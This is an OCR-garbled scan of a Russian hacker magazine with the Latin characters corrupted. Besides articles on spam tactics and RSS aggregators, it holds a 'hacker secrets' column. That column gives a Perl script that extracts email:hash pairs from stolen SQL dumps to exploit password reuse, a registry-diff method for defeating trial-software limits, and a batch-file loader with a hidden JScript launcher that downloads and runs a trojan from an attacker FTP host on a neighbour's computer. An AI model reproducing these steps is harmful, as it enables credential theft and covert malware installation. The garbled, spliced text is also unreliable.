ГтаіІ.ѵапсіех.ітГ) от Яндекса. Благо- 
даря эвристическим алгоритмам и 
огромной базе, как поисковой, так 
и корреспонденции своих пользо- 
вателей, сервисы с большой долей 
вероятности могут отсеивать спам. 
Причем если Соо§1е отлично справ- 
ляется с иностранными рассылка- 



ми, но легко пропускает рекламу 
на русском языке, то с последней 
легко разбирается Яндекс. Почта. 
Это совершенно не значит, что не- 
пременно нужно отказываться от 
своего ящика и переходить к адресу 
на бесплатном сервере. Вовсе нет. 
Тот же §шаі1.сот умеет заби- 
рать почту с любого ящика (как 
почтовый клиент) и отправлять 
письма с твоим основным адресом 
в графе «Отправитель», и вместе с 
Яндекс. Почтой они поддерживают 
переадресацию. Поэтому вставить 
систему в цепочку приема почты, в 
общем-то, будет несложно! 
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письма, посылая макулатуру подобного рода: «Привет, 
любимый... бла-бла-бла, а я воттут недавно озаботилась по- 
иском чугунныхтруб и решила, что ничего лучше, чем про- 
дукция фирмы «Рога и Копыта», в нашей округе не нашла. 
Звони им по телефону 55-555-555, целую тебя в хвостик». 
Теоретически написать письмо, которое будет воспринято 
как послание от близкого человека, вполне возможно, но 
практически... полезный выхлоп у такой рассылки будет 
нулевой. Новая волна спамеров наконец-то наладила кон- 
такте мозгами и, вспомнив прописную истину, гласящую, 
что кратность — сестра таланта, стала бороться за каждое 
слово. «Чугунные трубы любой длины. Самовывоз из 



ТРЮКПЯТЫИ: 

ТАКА НА ПОИСКОВЫЕ МАШИНЫ 



К 

Почта — это, конечно, хорошо и очень правильно, но... в 
последнее время все большую актуальность приобретают 
нападки на поисковые машины. Цель спамера — сформиро- 
вать запрос, который поисковик выдаст в числе первых и по 
которому человек с высокой степенью вероятности зайдет 
на сайт, рекламирующий совсем нето, что ожидалось. На 
первый взгляд, такое невозможно! Поисковые машины 
давно уже вышли из ясельного возраста и научились авто- 
матически удалять нарушителей из индексной базы. Ктому 
же никакой спамер не можетзаранее знать, что наберет в 
строке поиска тот или иной пользователь. 

На самом деле тут есть одна лазейка, позволяющая нечес- 
тным ѵѵеЬ-страницам подниматься вверх, довольно долго 
удерживая свои позиции. Всякий раз, когда пользователь 
щелкает по ссылке, его браузер посылаетѵѵеЬ-серверу 
предыдущую ссылку в специальном поле Ре^егег. В случае 
с поисковиками это поле, как правило, содержит полную 
строку запроса и номер текущей страницы поиска. То есть 
если на наш сайт все-таки зашли (возможно, даже чисто 
случайно, по неполно му совпадению ключевых слов), вла- 
дельцу сервера ничего не стоит поднять логи и по строке 



Мухосранска. 555-555-555». Тот, кому эти трубы совсем не 
приснились, все равно не клюнетна рекламу и не позво- 
нит. А вот если получатель хотя бы потенциально способен 
совершить покупку, то он должен прочесть рекламный текст 
прежде, чем успеет его удалить, а потому тот должен быть 
предельно кратким и правильно оформленным сточки 
зрения дизайна. 

Как бороться со спамом такого типа? Ответ — начинать 
чтение письма с конца, то есть не с конца, а с послед- 
ней строки, отображающейся в окне предварительного 
просмотра. Даже у грамотно сконструированного спама 
шансы на выживание при этом резко сокращаются. 



«Ве^егег» восстановить полную картину происходящего. 

Вот пример из личного опыта. Смотрю я лог своего сервера 
и вижу там Ьир:/А/ѵѵѵ\л/.аооа[е.бе/5еагсб?Ь[=бе&д=Ве 
тоѵе+РА6Е Ы0АССЕ55&Ы:п6=6ооаІ.е-5исЬе&теіа= . 
мне становится интересно, что же реально искали и что 
нашли? Копирую ссылку в адресную строку браузера и... 
впервой же строке запроса вижу свою книгу — «Часке г 
ВізаззетЫіпд ІЧпсоѵегесІ». Поразительно, по каким только 
ключевым словам ее ни находят! Естественно, накапливая 
поисковые запросы, по которым люди заходят на сервер, 
я мог бы существенно повысить рейтинг посещаемости, 
только мне это на фигне нужно, поскольку сервер дохода 
не приносит и установлен исключительно из желания 
почувствовать себя администратором :]. Но вот владельцы 
других ресурсов, похоже, этой возможностью не брезгуют, 
активно используя ее, в результате чего на запрос «ІВ- 
тоизе» поисковики зачастую выдают ответы вида «Ьезі 
ІР-тоизе апсі ЬоНезІ: дігіз! Іоѵѵезі ргісез!». Ну, коза с порш- 
нем от мотоцикла уже вошла в историю, но вот ночная фея с 
инфракрасной мышью — это что-то новенькое. Воттолько, 
нажав на ссылку, мы с высокой степенью вероятности не 
получим ни того, ни другого, и нам вновь предложат чугун- 
ные трубы или точную копию часов от Версаче по цене 2 
убитых енота за погонный метр, т 



Ы: ір://со трапу. 
ѵапсіех.ги/а гіісіез/ 
зратооЬогопа.Ьіт І 
— история развития 
спама и антиспам- 
средств. 
ги.ѵѵікіресііа.огд/ 
ѵѵікі/Спам — описа- 
ние методов борьбы 
со спамом. 



> ІП^О 

Большое количес- 
тво спама сейчас 
распространяет- 
ся посредством 
социальных сетей. 
Если ты пользу- 
ешься укщт^ак^ 
тили, например, 
осіпокіаззпікі.ги . то 
понимаешь, о чем я 
говорю. Ксчастью, 
почти в каждую сис- 
тему встроена спе- 
циальная защита, 
которая ищетлевые 
аккаунты, опреде- 
ляет фальшивых 
друзей и значитель- 
но сокращает долю 
спама. 
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Иачтоспособенцвои 

Вб^^еКтор^ШШ 




V 

! И форумов, 



Багтраки, всевозможные новостные ресурсы, десятки тематических сайтов 
блоги и подкасты — чего только не просмотришь за день, чтобы находиться в курсе собы- 
тий. Но если использовать для этого один лишь браузер, то серьезно рискуешь провести 
за серфингом целый день, так ничего толком и не сделав. Есть два варианта: либо резко 
сократить количество посещаемых ресурсов, либо же искать способы более эффектив- 
ной обработки информации. И мы за второй вариант! 



ще нетакдавно я сильно заморачивался в попытках облег- 
чить себе поиск и обработку информации. Чтобы не посещать 
сайты впустую, я использовал утилиту СИеск&ЗеІ (уууууу. 
асбѵеигіз.сот ). которая проверяла базу нужных мне сайтов и 
могла точно сказать, какие из них обновились, а какие нет. Для популярных 
новостных ресурсов я быстро наловчился писать парсеры на Регі и полу- 
чал данные в опрятном виде без лишних баннеров и мусора. Аобновления 



на форумах можно было легко отслеживать программами вроде ѴѴеЬ Рогит 
Реасіег ( ѵѵѵѵѵѵ.сЬетІаЫе.сот ). 

Но времена, когда нужно было так извращаться, уже давно прошли! 
Сейчас почти любой ресурс, будь это обычный блог, крупный новостной 
портал, форум по информационной безопасности или что угодно еще, 
поддерживает экспорт информации, причем во вполне определенном 
виде. Речь идет, конечно же, о формате Р55 (Реаііу Зітріе ЗупсПсаІіоп) 
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аксейчас вы 



глядит МазЬир Есіііог от боодіе 



Наша чудо-« дв 



и его более продвинутом варианте — Аіот. Позволю себе напомнить, 
что Р55 — семейство ХМ Б-фор матов, предназначенных для описания 
лент новостей, анонсов статей, изменений в блогах и т.п. Каждый сайт 
может экспортировать любые данные: новости, заголовки новостей, 
новые опубликованные программы, прогноз погоды и т.д. и т.п. Как 
правило, подобный файл создается автоматически движком ресурса 
и располагается на сервере, имея точно такой же И РІ_, что иуобычной 
странички. Ну например: ѵѵѵѵѵѵ.хакер.ги/агіісіез/гзз . Если просмотреть 
его обычным браузером, то можно увидеть примерно те же самые дан- 
ные, что и на сайте, только специальным образом структурированные 
и оформленные в виде файла ХМ Б: 

<?хш1 ѵегзіоп= " 1 . О " епсосЗ-іпд^ "иЦб-8 " ?> 
сЕееб. хт1пз="1П;Бр: / /ѵгѵм.ѵгЗ . огд/2005/АЦот"> 
<ЕіЕІе>Ехатр1е РеесІ</Еі1:1е> 

<зиЬЬіЕІе>ІпзегЕ міЕСу ог іпзідЬЦЕиІ гешагк Ь.еге</ 
зиЪБіі:1е> 

<1іпк ЬгеЕ="Ы:Ьр: / /ехатріе . огд/ " /> 
<ирбаБеб>2003-12-13ТІ8 : 30 : 022</ирбакесЬ> 

<аиЫіог> 

<пате>іІГо]іп Бое</паше> 

<етаі1>докпс1ое@ехатр1е . сот</етаі1> 

</аиЫіог> 

<іб>игп :ииіб: 60а7бс80-с3.399-11(39-Ь91С-0003939е0аЕб</ 
іб> 

<епкгу> 

<ЕіЕІе>АСот-Рсжегес1 КоЪоЕз Кип Аток</Бі1:1е> 

<1іпк Ьге:Е="]іБЕр : / /ехатріе . огд/ 2 003 /12 /13 /АкотОЗ " /> 
<іб>игп:ииіс1: 1225сб95-сЕЬ8-4еЬЬ-аааа-80(1а344еЕаба</ 
Іб> 

<ирбаСесЕ>2003-12-13Т18 : 30 : 022</ирбаЦесЕ> 
<зшптагу>8оше СехС .</зиттагу> 

</епкгу> 

</ЕеесЬ> 

Для чтения Р55 используются программы-агрегаторы. Они через 
определенные промежутки времени просматривают ленты, на которые 
подписался пользователь, ищут изменения и в удобном для пользо- 
вателя виде выводят их на экран. Ну и что с того? Ато, что ты можешь 
получить все новостные ленты, все форумы, все ЖЖ и прочие блоги 
в одном единственном месте — в твоем агрегаторе! Более того, если 
приспособиться к такому замечательную средству, какѴаЬоо Рірез 
(речь о нем пойдет ниже), то можно получать обновления результатов 
интересующих тебя поисковых запросов и данные с тех сайтов, где экс- 
порт сам по себе не предусмотрен! Вообще вырисовывается довольно 
забавная картина: все знают об В55 и отлично понимают его прелести, 
но при этом очень многиеупорно продолжают его игнорировать. Пора 
это исправить! 



0 К55-АГРЕГАТ0РЫ 

Несмотря на существование просто колоссального количества Н55-аг- 
регаторов, выполненных в виде обычных программ (ну взять хотя бы Бееб 
бетоп, Р55 Сгаѵѵі], я тебе все-таки настоятельно рекомендую использо- 
вать онлайн-инструменты. Почему? Во-первых, обратиться к ним можно 
везде и всегда, независимо оттого, где ты находишься, для этого требуется 
лишь браузер. Во-вторых, это моментально решает проблемы синхрони- 
зации всехтвоих лент. Разве приятно читать одно и то же по несколько раз 
дома и на работе, теряя драгоценное время? В-третьих, онлайн-сервисы 
никогда не удаляют полученные данные, а значит, ты сможешь вернуться к 
любой записи через день, месяцили даже год (причем ее давноуже может 
не быть на сервере-первоисточнике!). В общем, сплошные плюсы и ни 
одного минуса! Единственным недостатком всей этой затеи можно было бы 
назвать необходимость в постоянном доступе в интернет, но с появлением 
такой технологии, какбоодіе беагз, отпала и она! Агрегатор боодіе Веабег 
отлично чувствует себя в полностью автономном режиме, без подключения 
к Сети, по-прежнему работая в окне браузера! Вотс него-то мы и начнем 
наш мини-обзор! 

боодіе Реасіег ( ѵѵѵѵѵѵ.аооаіе.сот/геасіег ) является одним из самых извест- 
ных и функциональных онлайн-агрегаторов Р55/А1от, работающих через 
браузер. Вышедший в свет как продукт боодіе БаЬз (отдел эксперимен- 
тальных разработок боодіе) в 2005 году, он уже был обречен на успех. Что 
там говорить, боодіе был бы не боодіе, если бы не создал почти идеальное 
средство для чтения информационных потоков с потрясающе удачным 



Альтернатива УаЬоо 
Рірез от Соо§1е 

Соо§1е, естественно, тоже не остается в стороне и занимается разра- 
боткой своего сервиса Соо§1е МазЬир Ебіиог. Несмотря на то что сервис 
еще не был официально открыт для публичного использования, он уже 
сейчас работает в экспериментальном режиме и располагается по адресу 
ебіЕог. еоо ЕІета5Ішр5 . сот . На сайте можно оставить заявку на тестирова- 
ние, и если повезет, то и тебе удастся опробовать сервис до официального 
релиза. СМЕ также предоставляет возможность создавать приложения 
прямо в окне браузера, но используемый подход в корне отличается от 
того, что мы видели в УаЬоо Рірез. Вместо визуального проектирования 
пользователю предоставляется специальный язык программирования, 
на котором описываются не только правила сбора и обработки информа- 
ции, но также и интерфейс, с помощью которого они будут представле- 
ны. Уакоо Рірез в этом плане сильно проигрывает, поскольку регламенти- 
рует лишь порядок обработки информации. На сайте уже сейчас можно 
познакомиться с примерами разработки таких приложений, чтобы 
понять общие принципы, используемые в этой технологии. 
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интерфейсом, стабильной работой, возможностью отключиться от инета и 
читать фиды оффлайн. Я уже не говорю о встроенном плеере подскастов, 
специальной версии для мобильныхустройств и функции поиска по фидам, 
в возможностях которых не приходится сомневаться! 

Яндекс.Лента [ Іепіа.ѵапсіех.ги ) — сервис, разработанный уже крупнейшим 
отечественным поисковиком, который также позволяет объединять Р55- 
потоки в одну ленту и читать их, отмечая полюбившиеся сообщения. Конек 
этого сервиса — простота. Здесь нет ничего лишнего: только парсингфидов 
и их качественное представление в виде ленты или нескольких лент. 
ЫеМЬез ( мѵѵѵѵ.пеІѵіЬез.согп ) — это уже не просто П55-агрегатор, а пер- 
сональная страничка, которую легко можно сделать стартовой в своем 
браузере. Сама страница состоит из набора так называемых виджетов 
(функциональных элементов), которые можно передвигать и размещаться 
кактебе угодно. Основная цель — это, конечно, чтение Н55/Аіот-каналов, 
но помимо этого с помощью блоков-виджетов можно отображать прогноз 
погоды, состояние любого почтового ящика, свежие новости ит.д. ит.п. 

^ МЕСИМ ТЕСТО СУАНОО РІРЕ5! 

Настроив в своем агрегаторе подписки, тщательно рассортировав их по 
категориям и снабдив тэгами, можно подумать, что все готово, но это не 
так. Многие ресурсы зачастую делают один единственный фиддля всей 
информации на сайте, поэтому некоторые из подписококазываются сильно 
загруженными. Чтобы прочитать новости из интересующего тебя раздела, 
приходится просматривать все подряд, перелопачивая массулишней 
инфы. Повторяющаяся информация в различных подписках начинает 
сильно напрягать. А через некоторое время привычка к Р55 окончательно 
формируется и становится очень неприятно, когда выясняется, что какой-то 
нужный тебе ресурс такого экспорта не поддерживает. Воттут-то и начина- 
ешь задумываться о возможностях фильтрации, комбинирования разных 
подписок и импорта информации нетолько из Р55/Аіот, но и из любых 
других ресурсов! 

Самое время познакомиться стехнологией тазб-ир (в переводе с англ, 
«смешивать»). Вообще говоря, это целая концепция построения веб-прило- 
жений путем комбинирования функциональности различных программных 
интерфейсов и источников данных. Большинство существующих решений 
— это серьезные продукты и платформы, которые используют в корпора- 
тивных сетях. Однако попадаются и очень простые, но вместе стем крайне 
эффективные инструменты, которые непременно надо взять на вооружение. 
Одной из наиболее доступных за счет визуального интерфейса и понятных 
разработок является продукт от компании Уабоо — Уабоо Ріреь ( рірез.ѵабоо. 
сопл ). Сами разработчики позиционируют сервис как комбинатор и агрега- 
тор любых источников информации, но с расширенными возможностями. 

На деле пользователю предоставляется просто невиданный простор для 
действий, позволяющий ему загружать данные из самых разных источни- 
ков информации, определенным образом фильтровать и перерабатывать 
их, получая на выходе готовый результат. 

Воттебе простой пример. Допустим, есть ряд новостных ресурсов, популяр- 
ный форум и несколько подписок на дневники ЖЖ, где иногда попадаются 
сообщения о свежих эксплойтах. Нет никакой проблемы втом, чтобы под- 
писаться на них в своем агрегаторе и получать десяток разных лент. А как 
бы было здорово не читать все подряд, а создать одну-единственную ленту, 
куда бы автоматически складывались сообщения, относящиеся к эксплой- 
там! Вот это и можно сделатьс помощью Уабоо Рірез. Представь источники 
данных в виде резервуара с водой. Данные, которые появляются на сайтах, 
подобно жидкости, поступают в нашу водопроводную систему, перетекают 
по трубам из одной емкости в другую, где с ними могут происходить какие-то 




преобразования, и в конце концов смешиваются, превращаясь в единое 
целое. Это целое — поток свежих, актуальных данных, отделенных от всего 
потока информации с помощью фильтров и некоторого набора правил! 
Думаешь, это простая аналогия! Ни фига! СУабоо Рірез тебе действительно 
придется построить водопровод, поэтому самое время поделиться с тобой 
нашим сантехническим опытом! 

Вся работа с сервисом осуществляется через графический интерфейс. Сле- 
ва располагается панель с всевозможными модулями. Ты можешь мышкой 
перенести на рабочую область (она находится справа) сколько угодно этих 
модулей, после чего соединить их «трубами» в той последовательности, в 
которой подразумевается обработка информации. 

Предлагаю посмотреть, как это работает, на простейшем примере. Возьмем 
какой-нибудь иностранный ТеесІ (пусть это будут новости с популярного 
ресурса по безопасности — ЬирѴ/пеѵѵ.азІаІаѵізІазегѵег.согпЛеесІ/пеѵѵз 
ЬеасШпез еп.хті ). переведем всезаписи на русский языки оформим в 
виде новой Р55-ленты, на которую можно будет подписаться в любимом аг- 
регаторе. Нет проблем! Для того чтобы извлечь данные из Р55-потока, пот- 
ребуется модуль Реісб РеесІ, который находится в разделе Эоигсез. Кидаем 
его на рабочую область и в качестве единственного параметра указываем 
ссылку на П55-ленту, которую будем обрабатывать. Таких лент можетбыть 
несколько даже в рамках одного модуля, но мы пока ограничимся одной. 

Тут стоит обратить внимание на нижнюю часть экрана, где располагается 
отладчик (ОеЬиддег). Он всегда отображает промежуточные результаты и 
сейчас должен показывать заголовки иностранных новостей. 

Далее мы будем каждую новость переводить по очереди, то есть обраба- 
тывать поступивший на входХМБ-файл поэлементно: сначала переведем 
одну новость, потом вторую и так до тех пор, пока не дойдем до самого 
конца. Для того чтобы последовательно выполнить определенное действие 
над элементами фида, используется модуль І_оор (раздел Орегаіогз): раз- 
мещаем его на рабочей области и связываем с первым модулем «трубой». 
Первый его параметр Рогеасб указывает поле, над которым будетпроиз- 
водиться действие. Для простоты мы будем переводить только названия 
новостей, поэтому указываем поле, которое за них отвечает, — іІет.убіИе 
(надо сказать, что список доступных полей, естественно, представлен в 
выпадающем меню и набирать вручную ничего не надо). 

Теперь важный момент: в самом модуле І_оор поумолчанию никаких 
действий не определено, ему необходимо указать, что именно де- 
лать с каждым из элементов. Для этого ищем в разделе Эігіпд модуль 



Тірз’пТгіскз 

Бывает, что при импортировании той или иной ленты в УаЬоо Рірез 
вместо русских букв отображается абракадабра. Это происходит из- 
за того, что в качестве кодировки у ленты используется не Ііпісосіе, а 
ѴѴіп-1251. Для того чтобы избавиться от этой проблемы, достаточно 
предварительно пропускать весь поток данных через перекоди- 
ровщик (скрипт ты найдешь на диске) . Лучше всего, конечно, 
установить его у себя на сервере, но если под рукой нет хостинга или 
просто банально лень, то можно обратиться к уже существующим 
сервисам: кнр://ші11іат.сз\ѵІ2.ог§Лоо1/хт1ісопѵ/?іе=\ѵіпс1о\ѵ5- 
1251 &иг1 = Ьйр : //игі/до/нужного/фида. Но гарантий их работы, 
естественно, никто не дает. 
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Тгапзіаіе и помещаем внутрьуже созданного модуля І_оор, а 
заодно выбираем пункт ЕпдІізЬ {о Виззіап в качестве языка 
перевода. Вот почти все. Теперь связываем модуль І_оор с 
элементом Ріре Оиіриі, который означает выход из «водо- 
провода», и наслаждаемся результатом! 

г ПОЛЕЗНЫЕ МОДУЛИ УАНОО РІРЕ5 

Любые пайпы можно сохранить на сайте и предоставить для 
просмотра любым желающим (по умолчанию так и происхо- 
дит]. Проще всего разобраться в работе сУаЬоо Ріре именно 
на чужих примерах, но для того, чтобы все понять, необходимо 
знать предназначение основных модулей. 

1 . Модули из раздела Боигсез предназначены для получения 
данных из внешних источников: это может быть ПББ/Аіот- 
фид, результат работы поисковых сервисов или даже какой- 
нибудь конкретный сайт, не имеющий возможности экспорта 
информации! 

РеІсЬ Реесі — модуль предназначен для чтения информации 
из указанной Р55-ленты (или лент), мы использовали его в 
примере. Адрес ленты можно задать вручную или же подста- 
вить в виде параметра из другого блока. 

РеІсЬ Раде — загружает страницу, находящуюся по задан- 
ному ІІРІ_, в строку-переменную, с которой далее можно 
делать все что угодно. Если изучить форматирование этой 
страницы, то легко можно вытащить из полученной строки 
важную информацию, используя комбинацию модулей, 
описанных ниже. 

Рііскг — позволяет получить заголовки и картинки по задан- 
ному ключевому слову с популярного сервиса для загрузки 
фотографий Рііскг.сот. 

УаЬоо! БеагсЬ — возвращает поисковые результаты УаЬоо 
по заданному ключевому слову в виде Р55-потока. Можно 
получить ТІТІ_Е сайта, его ІІПІ_, дату последнего обновления в 
индексе и некоторые другие данные. 

2. Следующий раздел — Ызег Іприіз — содержит элементы, 
позволяющие запросить ввод данныху пользователя. 

Тех* Іприі — чаще всего ты будешь использовать именно этот 
элемент, позволяющий задать строковые переменные, которые 
можно передавать в качестве любых параметров другим моду- 
лям. Существует также приватная версия этого модуля, скрыва- 
ющая введенные данные от других участи и ков УаЬоо Ріре. 

3. Орегаіогз — так называемые операторы позволяют произво- 
дить надданными из Р55 определенные манипуляции. Причем 



каждый оператор применяетсвое действие для всех ііеппзфида. 
Ріііег — о его назначении легко догадаться из названия: этот 
модуль предназначен для фильтрации данных с Н55-ленты. 
Условия можно наложить на любые поля: к примеру, про- 
пускать все элементы фида, у которых в поле Міе есть слово 
ехріоіі. 

І_оор — этот модуль циклически перебирает каждый ііет Н55- 
фида, применяя к его элементам какие-то модификаторы, то 
есть производя определенные действия сданными. Сам І_оор 
информации о производимых действиях не несет, поэтому их 
необходимо задать, разместив внутри него модули из раздела 
Ббпдз. 

Редех — этот модуль поможет ввести регулярное выражение и 
применить его к любой текстовой строке! 

Тгипсаіе — обрезает количество элементов в Р55 до указан- 
ной длины. 

Таіі — делаетто же самое, только с конца списка. 

Брііі — разделяет Р55-данные на два одинаковых потока. 
ІІпіоп — объединяет вместе до пяти потоков. 

ІІпщие — удалит элементы, которые содержат дублирующую 
строку. Например, если ты хочешь, чтобы на выходе П55-лен- 
ты не было элементов с одинаковым Ше.то можно использо- 
вать этот оператор для фильтрации дублей. 

4. Бігіпд — этот раздел содержит модули, позволяющие мани- 
пулировать со строками. 

Тгапзіаіе — поможет перевести строки с одного языка на 
другой. 

Конечно, это лишь основные модули, которые ты можешь 
использовать в УаЬоо Рірез. В действительности их намного 
больше, но даже этого набора хватит, чтобы уже прямо сей- 
час взяться за создание своей собственной «трубы». Надо 
понимать, что УаЬоо Рірез можно использовать нетолько 
для удобного чтения данных. Люди, которые занимают- 
ся 5Е0, давно приспособили УаЬоо Рірез для полностью 
автономного обновления своихтематических ресурсов. 
Созданные ими «трубы» парсят всевозможные новостные 
ресурсы, блоги, отслеживают наиболее острые темы (на 
основе сервиса данных Ооодіе Тгепсіз] и самостоятельно 
заполняют сайт самым свежим и актуальным контентом, 
принося таким образом прибыль! Такие ресурсы называ- 
ются сблоги. Не бойся экспериментировать: я уверен, что и 
ты быстро найдешь свое нестандартное применение этому 
замечательному сервису. ИНИ 




> Ііпкз 

ЬЛр ://тазіег- рі рег- 
ги - форум по УаЬоо 
Рірез. 

ЫірѴ/ги.ѵѵікіресііа. 
огд/ѵѵікі/Р55 - опи- 
сание стандарта 
Р55. 

ЬЛр://еп.ѵѵікіресІіа. 
огд/ѵуікі/Аіот 
(зіапбагбі- описа- 
ние стандарта Аіот. 




Панель инструментов 
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Базу Наск} 

ВЛАДИМИР «ООТ.ЕВН» САВИЦКИЙ ЛЕОНИД «СВ@ѴѴІ_ЕВ» ИСУПОВ ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ КАІРОГЫГЕ@ВК.П1І / / СПАѴѴІ.ЕПНАСК@ПАМВІ.ЕП.Гиі / / КОІО@МАІІ_.ВІІ / 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




ЗАДАЧА 



3 ПРЕОБРАЗОВАТЬ 5СИ-ДАМП К ВИДУ ЕМАІЬ 

РА55ѴѴ0РР. 

РЕШЕНИЕ: 



Проблема парсинга баз, втом числе и 5СН_-дампов, не нова даже для 
хакеров-новичков. Ведь не секрет, что большинство ломаемыххакерами 

ресурсов в качестве 
логина пользователя 
использует имен- 
но мыло :). Также 
известно, что многие 
юзеры оченьлюбят 
ставить один и тот 
же пассворд на кучу 
сервисов, а значит, 
и здесь есть, чем 
поживиться широкому 
хакерскому карма- 
ну. Сразу скажу, что 
способов реализации 

задуманного несколько. Начнем с первого: 

1. Скачиваем известный продукт Оепѵѵег, который включает в себя связку 
РНР+АрасЬе+Му50І_, и устанавливаем его на ІосаІЬозб 

2. Запускаем идущий с Оепѵѵег в комплекте рЬртуасІтіп, проверяем рабо- 
тоспособность Му5СІІ_ и импортируем нужный 500-дамп. 

3. Выполняем запрос кСУБД и получаем необходимые данные. Каквари- 
ант — можно воспользоваться Му50І_-клиентом от Р5Т, либо за юзать уже 
готовый к бою рЬртуасІтіп. Запрос, естественно, будет напрямую зависеть 
от названия полей/таблиц, поэтому ограничусь общим видом: 




Кроме того, не забывай про возможность внедрения спецсимволов 
при помощи функции сЬаг(], а также про регулирование выдавае- 
мого мускулом количества записей с помощью ІітіС Стоит отметить, 
что описанный способ работает всегда и везде, но он далеко не 
единственный. Нетакдавноя наткнулся на любопытный скрипт, 
предназначенный как раз для парсинга 5СН_-дампов (ищи его на 
нашем 0Ѵ0): 

# ! /изг/Ьіп/регІ 

ореп ( ЗКС , " $АКСѴ [ 0 ] " ) ог біе " Сап ' б ореп $АКСѴ [ 0 ] : $ ! " ; 
ореп (КЕЗ, ">$АКСѴ[1] " ) ог сііе "Сап'б сгеабе 
$АКСѴ [ 1 ] : $ ! " ; 

@згс = <ЗКС>; 

$пшп = @згс; 

бог ( $іа. = 1 ; $ ісЗ. != $пиш;$і(5++) { 

$збг = "$згс [$ій] " ; 

Іб ($3бг = ~ /\Ѵ7+@\ш+ . \ѵѵ+/ ) { 

$шаі1 = $&; 

} 

іб ( $ збг =~ /\ѵѵ{32 } / ) { 

$1іаз1і = $&; 

$гез = зоіп ' : ' , 

$шаі1 , $Ь.азЬ.; 
ргіпб КЕЗ "$гез\п"; 

} 

} 

Какты понял, сценарий сохраняет в файл списоквида таіЬЬазЬ, который 
впоследствии удобно экспортировать в утилу РаззѵѵогсІзРго. Запускается 
скрипт так: 

регі зсгірб.рі С:/(іитр.зд1 С : /гезиіб . бхб 



ЗЕЬЕСТ название_поля1 , название_поля2 бгош название, 
таблицы 



После окончания парсинга результат™ можешь наблюдать по адресу 
С:/гези1ихб 




ЗАДАЧА 



9 ПОЛУЧИТЬ СПИСОК ИЗМЕНЕНИЙ В РЕЕСТРЕ, ПРОИЗО- 
ШЕДШИХ ПОСЛЕ ЗАПУСКА ОПРЕДЕЛЕННОЙ ПРОГРАММЫ. 
РЕШЕНИЕ: 



Это очень актуальная задача. Взять хотя бы программы с ограниченным перио- 
дом действия. Для устранения ограничений по времени использования может 
понадобится узнать, какие ключи создаются в реестре (с целью их дальнейшей 
модификации/удаления). Можно воспользоваться навороченными утилитами 
вроде Редтоп, но мы пойдем более простым путем и установим с нашего диска 
или скачаем маленькую (архив весит25 Кб) программу гедзЬоб 




Полный списокизменений, произошедших с реестром 
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1. Запускаем гедэЬобехе, выбираем опции сохранения отчета (можно полу- 
читьего как втекстовом виде, таки в виде Ы:тІ-файла). 

2. Создаем исходный снимок реестра, нажав на кнопку «1-й снимок». 

3. Запускаем исследуемую программу, совершаем необходимые действия, 
закрываем ее. 



4. Делаем второй «снимок» реестра (кнопка «2-й снимок»), нажимаем на 
кнопку «Сравнить». НедзЬоІ проанализирует изменения, которые програм- 
ма внесла в реестр и выдаст полный отчет, содержащий информацию о 
новых и измененных разделах/параметрах реестра, включая пути к ключам 
и их содержимое. 




ЗАДАЧА 



Д СОЗДАТЬ Л ОАДЕР ДЛЯ ЗАГРУЗКИ ТРОЯНА 
НА КОМПЬЮТЕР СОСЕДА ПО ЛОКАЛ КЕ. 

РЕШЕНИЕ: 



В последнее время в Сети появилось огромное множество самых 
разнообразных троянов. На страницах журнала мы не раз описывали 
принцип действия распространенных зверьков, поэтому возвращаться 
к этому мы не будем. Лучше рассмотрим достаточно простой в реали- 
зации, но вполне работоспособный вариант собственного производ- 
ства. Ведь все, что есть в паблике, ты и так найдешь, не правда ли? :) 
Суть идеи такова: заюзать стандартный виндовый батник (с заранее 
описанными командами) и ^ѵа-скрипт, который будет прикрывать 
батник в процессе выполнения. Для осуществления задуманного нам 
понадобится: 

1. Любой РТР-сервер, к которому имеется доступ. Вполне сгодится 
какой-нибудь из бесплатных шаред-хостингов. 

2. Заранее написанный батник-лоадер. 

3. Заранее написанный ^ѵа -скрипт, который будет запускать л оа дер в 
скрытом режиме. 

Далее приступим к созданию батника-лоадера: 

1. Создаем файл Іоабег.Ьаб 

2. Заносим в него следующие команды: 



есЪо об б 

есЪо ореп ббр.Ъаскег . сот>1од. 
бхб&&есЬо 1одіп»1од. бхб&&ес!ю 
раззѵгогс1»1од . бхб&&ес1ю деб бііе. 
ехе»1од. бхб&&есбю Ъуе»1од.бхб 
ббр -з : Іод. бхб 
бііе . ехе 
сіеі Іод . бхб 

3. Теперь посмотрим на созданный нами лоадер болеетрезвым взглядом: 
Іод і п — логин оттвоего РТР-сервера, 
раззѵѵогсі — пароль оттвоего РТР-сервера, 

Лр.Ьаскег.сот — собственно, сам РТР’шник, 

Ые.ехе — файл, который мы сливаем с РТР-сервера. 

Итак, батник готов, настала очередь ^ѵа-скрипта: 

1 . Создаем скрипт зсгіріДз. 

2. Записываем в него: 

ѵаг МЗНЗЬеІІ = МЗсгірб . СгеабеОЪд есб ( "МЗсгірб . ЗЬеІІ " ) ; 
МЗНЗЛеІІ . Кип ( " Іоасіег . Ъаб " , 0 ) ; 

Ріа этом создание функционала завершено :). Остается склеить лоадер и ^ѵа- 
скрипт с какой-нибудь интересной утилой, которую удастся всучить соседу-ло- 
кальщику. Я надеюсь, что Ые.ехе будет за пускать калькулятор и ничего больше. 
В противном случае, ты загремишь под 273 статью УК РФ. Я предупредил! 





ЗАДАЧА 



дЗАМУТИТЬ БЭКАП ДАННЫХ БЕЗ ПОТЕРИ МЕСТА 
НА ВИНЧЕСТЕРЕ. 

РЕШЕНИЕ: 



Попытаемся решить эту проблему раз и навсегда при помощи одной из 
фишекфайловой системы ЫТР5 — жестких ссылок (Ьагб Ііпкз). Имя файла 
является жесткой ссылкой на определенную область памяти, причем мы 
неограничены в использовании нескольких жестких ссылок на одну иту 
же область, а значит, файл может иметь несколько имен. Жесткие ссылки 
работа ют толь ко в пределах одного логического диска с ЫТР5, не зани- 
мают места на винте и равноправны. Файл не будетудален, пока остается 
хотя бы одна жесткая ссылка. 

1. С оз даете я жесткая ссылка командой бзибіі ЬагсІ Ііпк с параметрами 
сгеаіе, именем жесткой ссылки и именем файла, на который она ссылает- 
ся. Для примера создадим ЬагсІ Ііпк на файл бос.бхб Наберем в консоли: 



а--». 



Мутим бэкап :) 



■шМгФМ 



бзибіі Ьагсіііпк сгеабе С : \каг<11іпк_бо_с1ос . бхб С:\дос. 
бхб 

В результате выполнения команды получим уведомление: 

Создана жесткая связь С : \Ьагс11іпк_бо_с1ос . бхб «===» 

С : \с1ос . бхб 

